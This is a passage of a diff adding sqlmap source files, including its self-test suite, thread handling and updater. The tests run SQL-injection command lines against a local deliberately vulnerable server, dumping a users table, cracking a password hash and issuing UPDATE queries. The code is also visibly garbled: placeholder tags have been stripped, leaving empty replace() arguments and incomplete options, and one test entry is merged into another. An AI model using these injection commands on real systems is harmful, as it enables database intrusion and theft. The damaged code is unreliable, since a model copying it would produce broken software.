(conf.dumpPath, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) + + conf.dumpPath = tempDir + +def _configureDumper(): + conf.dumper = dumper + conf.dumper.setOutputFile() + +def _createTargetDirs(): + """ + Create the output directory. + """ + + conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname))) + + try: + if not os.path.isdir(conf.outputPath): + os.makedirs(conf.outputPath) + except (OSError, IOError, TypeError) as ex: + tempDir = tempfile.mkdtemp(prefix="sqlmapoutput") + warnMsg = "unable to create output directory " + warnMsg += "'%s' (%s). " % (conf.outputPath, getUnicode(ex)) + warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir) + logger.warning(warnMsg) + + conf.outputPath = tempDir + + conf.outputPath = getUnicode(conf.outputPath) + + try: + with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f: + f.write(getUnicode(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)) + f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) + f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding)) + if conf.data: + f.write("\n\n%s" % getUnicode(conf.data)) + except IOError as ex: + if "denied" in getUnicode(ex): + errMsg = "you don't have enough permissions " + else: + errMsg = "something went wrong while trying " + errMsg += "to write to the output directory '%s' (%s)" % (paths.SQLMAP_OUTPUT_PATH, getSafeExString(ex)) + + raise SqlmapMissingPrivileges(errMsg) + except UnicodeError as ex: + warnMsg = "something went wrong while saving target data ('%s')" % getSafeExString(ex) + logger.warning(warnMsg) + + _createDumpDir() + _createFilesDir() + _configureDumper() + +def _setAuxOptions(): + """ + Setup auxiliary (host-dependent) options + """ + + kb.aliasName = randomStr(seed=hash(conf.hostname or "")) + +def _restoreMergedOptions(): + """ + Restore merged options (command line, configuration file and default values) + that could be possibly changed during the testing of previous target. + """ + + for option in RESTORE_MERGED_OPTIONS: + conf[option] = mergedOptions[option] + +def initTargetEnv(): + """ + Initialize target environment. + """ + + if conf.multipleTargets: + if conf.hashDB: + conf.hashDB.close() + + if conf.cj: + resetCookieJar(conf.cj) + + threadData = getCurrentThreadData() + threadData.reset() + + conf.paramDict = {} + conf.parameters = {} + conf.hashDBFile = None + + _setKnowledgeBaseAttributes(False) + _restoreMergedOptions() + _setDBMS() + + if conf.data: + class _(six.text_type): + pass + + kb.postUrlEncode = True + + for key, value in conf.httpHeaders: + if key.upper() == HTTP_HEADER.CONTENT_TYPE.upper(): + kb.postUrlEncode = "urlencoded" in value + break + + if kb.postUrlEncode: + original = conf.data + conf.data = _(urldecode(conf.data)) + setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) + kb.postSpaceToPlus = '+' in original + + if conf.data and unArrayizeValue(conf.base64Parameter) == HTTPMETHOD.POST: + if '=' not in conf.data.strip('='): + try: + original = conf.data + conf.data = _(decodeBase64(conf.data, binary=False)) + setattr(conf.data, UNENCODED_ORIGINAL_VALUE, original) + except: + pass + + match = re.search(INJECT_HERE_REGEX, "%s %s %s" % (conf.url, conf.data, conf.httpHeaders)) + kb.customInjectionMark = match.group(0) if match else CUSTOM_INJECTION_MARK_CHAR + +def setupTargetEnv(): + _createTargetDirs() + _setRequestParams() + _setHashDB() + _resumeHashDBValues() + _setResultsFile() + _setAuthCred() + _setAuxOptions() diff --git a/src/sqlmap-master/lib/core/testing.py b/src/sqlmap-master/lib/core/testing.py new file mode 100644 index 0000000..bb6af1a --- /dev/null +++ b/src/sqlmap-master/lib/core/testing.py @@ -0,0 +1,301 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import doctest +import logging +import os +import random +import re +import socket +import sqlite3 +import sys +import tempfile +import threading +import time + +from extra.vulnserver import vulnserver +from lib.core.common import clearConsoleLine +from lib.core.common import dataToStdout +from lib.core.common import randomInt +from lib.core.common import randomStr +from lib.core.common import shellExec +from lib.core.compat import round +from lib.core.convert import encodeBase64 +from lib.core.data import kb +from lib.core.data import logger +from lib.core.data import paths +from lib.core.data import queries +from lib.core.patch import unisonRandom +from lib.core.settings import IS_WIN + +def vulnTest(): + """ + Runs the testing against 'vulnserver' + """ + + TESTS = ( + ("-h", ("to see full list of options run with '-hh'",)), + ("--dependencies", ("sqlmap requires", "third-party library")), + ("-u --data=\"reflect=1\" --flush-session --wizard --disable-coloring", ("Please choose:", "back-end DBMS: SQLite", "current user is DBA: True", "banner: '3.")), + ("-u --data=\"code=1\" --code=200 --technique=B --banner --no-cast --flush-session", ("back-end DBMS: SQLite", "banner: '3.", "~COALESCE(CAST(")), + (u"-c --flush-session --output-dir=\"\" --smart --roles --statements --hostname --privileges --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=U", (u": '\u0161u\u0107uraj'", "on SQLite it is not possible", "as the output directory")), + (u"-u --flush-session --sql-query=\"SELECT '\u0161u\u0107uraj'\" --technique=B --no-escape --string=luther --unstable", (u": '\u0161u\u0107uraj'",)), + ("-m --flush-session --technique=B --banner", ("/3] URL:", "back-end DBMS: SQLite", "banner: '3.")), + ("--dummy", ("all tested parameters do not appear to be injectable", "does not seem to be injectable", "there is not at least one", "~might be injectable")), + ("-u \"&id2=1\" -p id2 -v 5 --flush-session --level=5 --text-only --test-filter=\"AND boolean-based blind - WHERE or HAVING clause (MySQL comment)\"", ("~1AND",)), + ("--list-tampers", ("between", "MySQL", "xforwardedfor")), + ("-r --flush-session -v 5 --test-skip=\"heavy\" --save=", ("CloudFlare", "web application technology: Express", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind", "saved command line options to the configuration file")), + ("-c ", ("CloudFlare", "possible DBMS: 'SQLite'", "User-Agent: foobar", "~Type: time-based blind")), + ("-l --flush-session --keep-alive --skip-waf -vvvvv --technique=U --union-from=users --banner --parse-errors", ("banner: '3.", "ORDER BY term out of range", "~xp_cmdshell", "Connection: keep-alive")), + ("-l --offline --banner -v 5", ("banner: '3.", "~[TRAFFIC OUT]")), + ("-u --flush-session --data=\"id=1&_=Eewef6oh\" --chunked --randomize=_ --random-agent --banner", ("fetched random HTTP User-Agent header value", "Parameter: id (POST)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.")), + ("-u -p id --base64=id --data=\"base64=true\" --flush-session --banner --technique=B", ("banner: '3.",)), + ("-u -p id --base64=id --data=\"base64=true\" --flush-session --tables --technique=U", (" users ",)), + ("-u --flush-session --banner --technique=B --disable-precon --not-string \"no results\"", ("banner: '3.",)), + ("-u --flush-session --encoding=gbk --banner --technique=B --first=1 --last=2", ("banner: '3.'",)), + ("-u --flush-session --encoding=ascii --forms --crawl=2 --threads=2 --banner", ("total of 2 targets", "might be injectable", "Type: UNION query", "banner: '3.")), + ("-u --flush-session --technique=BU --data=\"{\\\"id\\\": 1}\" --banner", ("might be injectable", "3 columns", "Payload: {\"id\"", "Type: boolean-based blind", "Type: UNION query", "banner: '3.")), + ("-u --flush-session -H \"Foo: Bar\" -H \"Sna: Fu\" --data=\"\" --union-char=1 --mobile --answers=\"smartphone=3\" --banner --smart -v 5", ("might be injectable", "Payload: --flush-session --technique=BU --method=PUT --data=\"a=1;id=1;b=2\" --param-del=\";\" --skip-static --har= --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: UNION query", "2 entries")), + ("-u --flush-session -H \"id: 1*\" --tables -t ", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), + ("-u --flush-session --banner --invalid-logical --technique=B --predict-output --test-filter=\"OR boolean\" --tamper=space2dash", ("banner: '3.", " LIKE ")), + ("-u --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")), + ("-u --flush-session --null-connection --technique=B --tamper=between,randomcase --banner --count -T users", ("NULL connection is supported with HEAD method", "banner: '3.", "users | 5")), + ("-u --data=\"aWQ9MQ==\" --flush-session --base64=POST -v 6", ("aWQ9MTtXQUlURk9SIERFTEFZICcwOjA",)), + ("-u --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")), + ("-u --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")), + ("-u --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\"crack=n\" -v 3", ("performed 6 queries", "nameisnull", "~using default dictionary", "dumped to HTML file")), + ("-u --flush-session --technique=BU --all", ("5 entries", "Type: boolean-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")), + ("-u -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [5]", "nameisnull")), + ("-u \"&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)), + ("-u \"&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")), + ("-d \"\" --flush-session --dump -T users --dump-format=SQLITE --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)", "dumped to SQLITE database")), + ("-d \"\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "'987654321'",)), + ("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")), + ) + + retVal = True + count = 0 + + while True: + address, port = "127.0.0.1", random.randint(10000, 65535) + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + if s.connect_ex((address, port)): + break + else: + time.sleep(1) + finally: + s.close() + + def _thread(): + vulnserver.init(quiet=True) + vulnserver.run(address=address, port=port) + + vulnserver._alive = True + + thread = threading.Thread(target=_thread) + thread.daemon = True + thread.start() + + while vulnserver._alive: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + try: + s.connect((address, port)) + s.sendall(b"GET / HTTP/1.1\r\n\r\n") + result = b"" + while True: + current = s.recv(1024) + if not current: + break + else: + result += current + if b"vulnserver" in result: + break + except: + pass + finally: + s.close() + time.sleep(1) + + if not vulnserver._alive: + logger.error("problem occurred in vulnserver instantiation (address: 'http://%s:%s')" % (address, port)) + return False + else: + logger.info("vulnserver running at 'http://%s:%s'..." % (address, port)) + + handle, config = tempfile.mkstemp(suffix=".conf") + os.close(handle) + + handle, database = tempfile.mkstemp(suffix=".sqlite") + os.close(handle) + + with sqlite3.connect(database) as conn: + c = conn.cursor() + c.executescript(vulnserver.SCHEMA) + + handle, request = tempfile.mkstemp(suffix=".req") + os.close(handle) + + handle, log = tempfile.mkstemp(suffix=".log") + os.close(handle) + + handle, multiple = tempfile.mkstemp(suffix=".lst") + os.close(handle) + + content = "POST / HTTP/1.0\nUser-Agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port) + with open(request, "w+") as f: + f.write(content) + f.flush() + + content = '%d' % (port, encodeBase64(content, binary=False)) + with open(log, "w+") as f: + f.write(content) + f.flush() + + base = "http://%s:%d/" % (address, port) + url = "%s?id=1" % base + direct = "sqlite3://%s" % database + tmpdir = tempfile.mkdtemp() + + with open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))) as f: + content = f.read().replace("url =", "url = %s" % url) + + with open(config, "w+") as f: + f.write(content) + f.flush() + + content = "%s?%s=%d\n%s?%s=%d\n%s&%s=1" % (base, randomStr(), randomInt(), base, randomStr(), randomInt(), url, randomStr()) + with open(multiple, "w+") as f: + f.write(content) + f.flush() + + for options, checks in TESTS: + status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS))) + dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) + + if IS_WIN and "uraj" in options: + options = options.replace(u"\u0161u\u0107uraj", "sucuraj") + checks = [check.replace(u"\u0161u\u0107uraj", "sucuraj") for check in checks] + + for tag, value in (("", url), ("", base), ("", direct), ("", tmpdir), ("", request), ("", log), ("", multiple), ("", config), ("", url.replace("id=1", "id=MZ=%3d"))): + options = options.replace(tag, value) + + cmd = "%s \"%s\" %s --batch --non-interactive --debug --time-sec=1" % (sys.executable if ' ' not in sys.executable else '"%s"' % sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options) + + if "" in cmd: + handle, tmp = tempfile.mkstemp() + os.close(handle) + cmd = cmd.replace("", tmp) + + output = shellExec(cmd) + + if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or "unhandled exception" in output: + dataToStdout("---\n\n$ %s\n" % cmd) + dataToStdout("%s---\n" % output, coloring=False) + retVal = False + + count += 1 + + clearConsoleLine() + if retVal: + logger.info("vuln test final result: PASSED") + else: + logger.error("vuln test final result: FAILED") + + return retVal + +def smokeTest(): + """ + Runs the basic smoke testing of a program + """ + + unisonRandom() + + with open(paths.ERRORS_XML, "r") as f: + content = f.read() + + for regex in re.findall(r'', content): + try: + re.compile(regex) + except re.error: + errMsg = "smoke test failed at compiling '%s'" % regex + logger.error(errMsg) + return False + + retVal = True + count, length = 0, 0 + + for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): + if any(_ in root for _ in ("thirdparty", "extra", "interbase")): + continue + + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py": + length += 1 + + for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH): + if any(_ in root for _ in ("thirdparty", "extra", "interbase")): + continue + + for filename in files: + if os.path.splitext(filename)[1].lower() == ".py" and filename not in ("__init__.py", "gui.py"): + path = os.path.join(root, os.path.splitext(filename)[0]) + path = path.replace(paths.SQLMAP_ROOT_PATH, '.') + path = path.replace(os.sep, '.').lstrip('.') + try: + __import__(path) + module = sys.modules[path] + except Exception as ex: + retVal = False + dataToStdout("\r") + errMsg = "smoke test failed at importing module '%s' (%s):\n%s" % (path, os.path.join(root, filename), ex) + logger.error(errMsg) + else: + logger.setLevel(logging.CRITICAL) + kb.smokeMode = True + + (failure_count, _) = doctest.testmod(module) + + kb.smokeMode = False + logger.setLevel(logging.INFO) + + if failure_count > 0: + retVal = False + + count += 1 + status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length)) + dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status)) + + def _(node): + for __ in dir(node): + if not __.startswith('_'): + candidate = getattr(node, __) + if isinstance(candidate, str): + if '\\' in candidate: + try: + re.compile(candidate) + except: + errMsg = "smoke test failed at compiling '%s'" % candidate + logger.error(errMsg) + raise + else: + _(candidate) + + for dbms in queries: + try: + _(queries[dbms]) + except: + retVal = False + + clearConsoleLine() + if retVal: + logger.info("smoke test final result: PASSED") + else: + logger.error("smoke test final result: FAILED") + + return retVal diff --git a/src/sqlmap-master/lib/core/threads.py b/src/sqlmap-master/lib/core/threads.py new file mode 100644 index 0000000..50b035f --- /dev/null +++ b/src/sqlmap-master/lib/core/threads.py @@ -0,0 +1,262 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from __future__ import print_function + +import difflib +import sqlite3 +import threading +import time +import traceback + +from lib.core.compat import WichmannHill +from lib.core.compat import xrange +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.datatype import AttribDict +from lib.core.enums import PAYLOAD +from lib.core.exception import SqlmapBaseException +from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapSkipTargetException +from lib.core.exception import SqlmapThreadException +from lib.core.exception import SqlmapUserQuitException +from lib.core.exception import SqlmapValueException +from lib.core.settings import MAX_NUMBER_OF_THREADS +from lib.core.settings import PYVERSION + +shared = AttribDict() + +class _ThreadData(threading.local): + """ + Represents thread independent data + """ + + def __init__(self): + self.reset() + + def reset(self): + """ + Resets thread data model + """ + + self.disableStdOut = False + self.hashDBCursor = None + self.inTransaction = False + self.lastCode = None + self.lastComparisonPage = None + self.lastComparisonHeaders = None + self.lastComparisonCode = None + self.lastComparisonRatio = None + self.lastErrorPage = tuple() + self.lastHTTPError = None + self.lastRedirectMsg = None + self.lastQueryDuration = 0 + self.lastPage = None + self.lastRequestMsg = None + self.lastRequestUID = 0 + self.lastRedirectURL = tuple() + self.random = WichmannHill() + self.resumed = False + self.retriesCount = 0 + self.seqMatcher = difflib.SequenceMatcher(None) + self.shared = shared + self.technique = None + self.validationRun = 0 + self.valueStack = [] + +ThreadData = _ThreadData() + +def readInput(message, default=None, checkBatch=True, boolean=False): + # It will be overwritten by original from lib.core.common + pass + +def isDigit(value): + # It will be overwritten by original from lib.core.common + pass + +def getCurrentThreadData(): + """ + Returns current thread's local data + """ + + return ThreadData + +def getCurrentThreadName(): + """ + Returns current's thread name + """ + + return threading.current_thread().getName() + +def exceptionHandledFunction(threadFunction, silent=False): + try: + threadFunction() + except KeyboardInterrupt: + kb.threadContinue = False + kb.threadException = True + raise + except Exception as ex: + from lib.core.common import getSafeExString + + if not silent and kb.get("threadContinue") and not kb.get("multipleCtrlC") and not isinstance(ex, (SqlmapUserQuitException, SqlmapSkipTargetException)): + errMsg = getSafeExString(ex) if isinstance(ex, SqlmapBaseException) else "%s: %s" % (type(ex).__name__, getSafeExString(ex)) + logger.error("thread %s: '%s'" % (threading.currentThread().getName(), errMsg)) + + if conf.get("verbose") > 1 and not isinstance(ex, SqlmapConnectionException): + traceback.print_exc() + +def setDaemon(thread): + # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation + if PYVERSION >= "2.6": + thread.daemon = True + else: + thread.setDaemon(True) + +def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True): + threads = [] + + def _threadFunction(): + try: + threadFunction() + finally: + if conf.hashDB: + conf.hashDB.close() + + kb.multipleCtrlC = False + kb.threadContinue = True + kb.threadException = False + kb.technique = ThreadData.technique + kb.multiThreadMode = False + + try: + if threadChoice and conf.threads == numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)): + while True: + message = "please enter number of threads? [Enter for %d (current)] " % numThreads + choice = readInput(message, default=str(numThreads)) + if choice: + skipThreadCheck = False + + if choice.endswith('!'): + choice = choice[:-1] + skipThreadCheck = True + + if isDigit(choice): + if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck: + errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS + logger.critical(errMsg) + else: + conf.threads = numThreads = int(choice) + break + + if numThreads == 1: + warnMsg = "running in a single-thread mode. This could take a while" + logger.warning(warnMsg) + + if numThreads > 1: + if startThreadMsg: + infoMsg = "starting %d threads" % numThreads + logger.info(infoMsg) + else: + try: + _threadFunction() + except (SqlmapUserQuitException, SqlmapSkipTargetException): + pass + finally: + return + + kb.multiThreadMode = True + + # Start the threads + for numThread in xrange(numThreads): + thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[_threadFunction]) + + setDaemon(thread) + + try: + thread.start() + except Exception as ex: + errMsg = "error occurred while starting new thread ('%s')" % ex + logger.critical(errMsg) + break + + threads.append(thread) + + # And wait for them to all finish + alive = True + while alive: + alive = False + for thread in threads: + if thread.is_alive(): + alive = True + time.sleep(0.1) + + except (KeyboardInterrupt, SqlmapUserQuitException) as ex: + print() + kb.prependFlag = False + kb.threadContinue = False + kb.threadException = True + + if kb.lastCtrlCTime and (time.time() - kb.lastCtrlCTime < 1): + kb.multipleCtrlC = True + raise SqlmapUserQuitException("user aborted (Ctrl+C was pressed multiple times)") + + kb.lastCtrlCTime = time.time() + + if numThreads > 1: + logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else "")) + try: + while (threading.active_count() > 1): + pass + + except KeyboardInterrupt: + kb.multipleCtrlC = True + raise SqlmapThreadException("user aborted (Ctrl+C was pressed multiple times)") + + if forwardException: + raise + + except (SqlmapConnectionException, SqlmapValueException) as ex: + print() + kb.threadException = True + logger.error("thread %s: '%s'" % (threading.currentThread().getName(), ex)) + + if conf.get("verbose") > 1 and isinstance(ex, SqlmapValueException): + traceback.print_exc() + + except Exception as ex: + print() + + if not kb.multipleCtrlC: + if isinstance(ex, sqlite3.Error): + raise + else: + from lib.core.common import unhandledExceptionMessage + + kb.threadException = True + errMsg = unhandledExceptionMessage() + logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) + traceback.print_exc() + + finally: + kb.multiThreadMode = False + kb.threadContinue = True + kb.threadException = False + kb.technique = None + + for lock in kb.locks.values(): + if lock.locked(): + try: + lock.release() + except: + pass + + if conf.get("hashDB"): + conf.hashDB.flush(True) + + if cleanupFunction: + cleanupFunction() diff --git a/src/sqlmap-master/lib/core/unescaper.py b/src/sqlmap-master/lib/core/unescaper.py new file mode 100644 index 0000000..09dcba6 --- /dev/null +++ b/src/sqlmap-master/lib/core/unescaper.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.datatype import AttribDict +from lib.core.settings import EXCLUDE_UNESCAPE + +class Unescaper(AttribDict): + def escape(self, expression, quote=True, dbms=None): + if expression is None: + return expression + + for exclude in EXCLUDE_UNESCAPE: + if exclude in expression: + return expression + + identifiedDbms = Backend.getIdentifiedDbms() + + if dbms is not None: + retVal = self[dbms](expression, quote=quote) + elif identifiedDbms is not None and identifiedDbms in self: + retVal = self[identifiedDbms](expression, quote=quote) + else: + retVal = expression + + # e.g. inference comparison for ' + retVal = retVal.replace("'''", "''''") + + return retVal + +unescaper = Unescaper() diff --git a/src/sqlmap-master/lib/core/update.py b/src/sqlmap-master/lib/core/update.py new file mode 100644 index 0000000..c50547b --- /dev/null +++ b/src/sqlmap-master/lib/core/update.py @@ -0,0 +1,171 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import glob +import os +import re +import shutil +import subprocess +import time +import zipfile + +from lib.core.common import dataToStdout +from lib.core.common import extractRegexResult +from lib.core.common import getLatestRevision +from lib.core.common import getSafeExString +from lib.core.common import openFile +from lib.core.common import pollProcess +from lib.core.common import readInput +from lib.core.convert import getText +from lib.core.data import conf +from lib.core.data import logger +from lib.core.data import paths +from lib.core.revision import getRevisionNumber +from lib.core.settings import GIT_REPOSITORY +from lib.core.settings import IS_WIN +from lib.core.settings import VERSION +from lib.core.settings import TYPE +from lib.core.settings import ZIPBALL_PAGE +from thirdparty.six.moves import urllib as _urllib + +def update(): + if not conf.updateAll: + return + + success = False + + if TYPE == "pip": + infoMsg = "updating sqlmap to the latest stable version from the " + infoMsg += "PyPI repository" + logger.info(infoMsg) + + debugMsg = "sqlmap will try to update itself using 'pip' command" + logger.debug(debugMsg) + + dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X")) + + output = "" + try: + process = subprocess.Popen("pip install -U sqlmap", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH) + pollProcess(process, True) + output, _ = process.communicate() + success = not process.returncode + except Exception as ex: + success = False + output = getSafeExString(ex) + finally: + output = getText(output) + + if success: + logger.info("%s the latest revision '%s'" % ("already at" if "already up-to-date" in output else "updated to", extractRegexResult(r"\binstalled sqlmap-(?P\d+\.\d+\.\d+)", output) or extractRegexResult(r"\((?P\d+\.\d+\.\d+)\)", output))) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"[^a-z0-9:/\\]+", " ", output).strip()) + + elif not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")): + warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository " + warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY + logger.warning(warnMsg) + + if VERSION == getLatestRevision(): + logger.info("already at the latest revision '%s'" % (getRevisionNumber() or VERSION)) + return + + message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" + if readInput(message, default='N', boolean=True): + directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) + + try: + open(os.path.join(directory, "sqlmap.py"), "w+b") + except Exception as ex: + errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex)) + logger.error(errMsg) + else: + attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode + for wildcard in ('*', ".*"): + for _ in glob.glob(os.path.join(directory, wildcard)): + try: + if os.path.isdir(_): + shutil.rmtree(_) + else: + os.remove(_) + except: + pass + + if glob.glob(os.path.join(directory, '*')): + errMsg = "unable to clear the content of directory '%s'" % directory + logger.error(errMsg) + else: + try: + archive = _urllib.request.urlretrieve(ZIPBALL_PAGE)[0] + + with zipfile.ZipFile(archive) as f: + for info in f.infolist(): + info.filename = re.sub(r"\Asqlmap[^/]+", "", info.filename) + if info.filename: + f.extract(info, directory) + + filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py") + if os.path.isfile(filepath): + with openFile(filepath, "rb") as f: + version = re.search(r"(?m)^VERSION\s*=\s*['\"]([^'\"]+)", f.read()).group(1) + logger.info("updated to the latest version '%s#dev'" % version) + success = True + except Exception as ex: + logger.error("update could not be completed ('%s')" % getSafeExString(ex)) + else: + if not success: + logger.error("update could not be completed") + else: + try: + os.chmod(os.path.join(directory, "sqlmap.py"), attrs) + except OSError: + logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py")) + + else: + infoMsg = "updating sqlmap to the latest development revision from the " + infoMsg += "GitHub repository" + logger.info(infoMsg) + + debugMsg = "sqlmap will try to update itself using 'git' command" + logger.debug(debugMsg) + + dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X")) + + output = "" + try: + process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH) + pollProcess(process, True) + output, _ = process.communicate() + success = not process.returncode + except Exception as ex: + success = False + output = getSafeExString(ex) + finally: + output = getText(output) + + if success: + logger.info("%s the latest revision '%s'" % ("already at" if "Already" in output else "updated to", getRevisionNumber())) + else: + if "Not a git repository" in output: + errMsg = "not a valid git repository. Please checkout the 'sqlmapproject/sqlmap' repository " + errMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY + logger.error(errMsg) + else: + logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", output).strip()) + + if not success: + if IS_WIN: + infoMsg = "for Windows platform it's recommended " + infoMsg += "to use a GitHub for Windows client for updating " + infoMsg += "purposes (https://desktop.github.com/) or just " + infoMsg += "download the latest snapshot from " + infoMsg += "https://github.com/sqlmapproject/sqlmap/downloads" + else: + infoMsg = "for Linux platform it's recommended " + infoMsg += "to install a standard 'git' package (e.g.: 'apt install git')" + + logger.info(infoMsg) diff --git a/src/sqlmap-master/lib/core/wordlist.py b/src/sqlmap-master/lib/core/wordlist.py new file mode 100644 index 0000000..d390ae6 --- /dev/null +++ b/src/sqlmap-master/lib/core/wordlist.py @@ -0,0 +1,93 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/) +See the file 'LICENSE' for copying permission +""" + +import zipfile + +from lib.core.common import getSafeExString +from lib.core.common import isZipFile +from lib.core.exception import SqlmapDataException +from lib.core.exception import SqlmapInstallationException +from thirdparty import six + +class Wordlist(six.Iterator): + """ + Iterator for looping over a large dictionaries + + >>> from lib.core.option import paths + >>> isinstance(next(Wordlist(paths.SMALL_DICT)), six.binary_type) + True + >>> isinstance(next(Wordlist(paths.WORDLIST)), six.binary_type) + True + """ + + def __init__(self, filenames, proc_id=None, proc_count=None, custom=None): + self.filenames = [filenames] if isinstance(filenames, six.string_types) else filenames + self.fp = None + self.index = 0 + self.counter = -1 + self.current = None + self.iter = None + self.custom = custom or [] + self.proc_id = proc_id + self.proc_count = proc_count + self.adjust() + + def __iter__(self): + return self + + def adjust(self): + self.closeFP() + if self.index > len(self.filenames): + return # Note: https://stackoverflow.com/a/30217723 (PEP 479) + elif self.index == len(self.filenames): + self.iter = iter(self.custom) + else: + self.current = self.filenames[self.index] + if isZipFile(self.current): + try: + _ = zipfile.ZipFile(self.current, 'r') + except zipfile.error as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) + if len(_.namelist()) == 0: + errMsg = "no file(s) inside '%s'" % self.current + raise SqlmapDataException(errMsg) + self.fp = _.open(_.namelist()[0]) + else: + self.fp = open(self.current, "rb") + self.iter = iter(self.fp) + + self.index += 1 + + def closeFP(self): + if self.fp: + self.fp.close() + self.fp = None + + def __next__(self): + retVal = None + while True: + self.counter += 1 + try: + retVal = next(self.iter).rstrip() + except zipfile.error as ex: + errMsg = 